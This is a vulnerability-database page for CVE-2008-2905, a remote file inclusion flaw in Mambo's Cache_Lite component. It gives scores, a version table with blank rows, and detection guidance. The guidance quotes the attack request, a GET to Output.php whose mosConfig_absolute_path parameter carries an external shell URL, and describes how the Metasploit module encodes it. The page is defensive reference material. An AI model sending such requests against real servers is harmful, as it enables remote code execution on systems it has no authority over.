cbcvebase.
CVE-2008-2905
published 2008-06-30

CVE-2008-2905: PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier, when register_globals is…

PriorityP347medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
18.40%
96.9th percentile
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

Affected

23 ranges
VendorProductVersion rangeFixed in
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo
mambomambo

Detection & IOCsextracted from sources · hover to see the quote

path/includes/Cache/Lite/Output.php
url/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
commandGET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!
  • Monitor HTTP requests targeting the path /includes/Cache/Lite/Output.php with a URL-valued mosConfig_absolute_path parameter, which is the injection point for this RFI vulnerability.
  • Alert on GET requests where the mosConfig_absolute_path query parameter contains an external URL (http:// or https://) — this is the canonical exploitation pattern for this RFI.
  • The Metasploit module hex-encodes the remote payload URL using Rex::Text.to_hex with '%' prefix before injecting it into mosConfig_absolute_path; detection rules should account for percent-encoded URLs in this parameter.
  • The vulnerable code path is the require_once call in Output.php that directly incorporates the unvalidated mosConfig_absolute_path value; file integrity monitoring on this file can help detect tampering.
  • ·The vulnerability is only exploitable when PHP's register_globals directive is enabled; systems with register_globals disabled are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.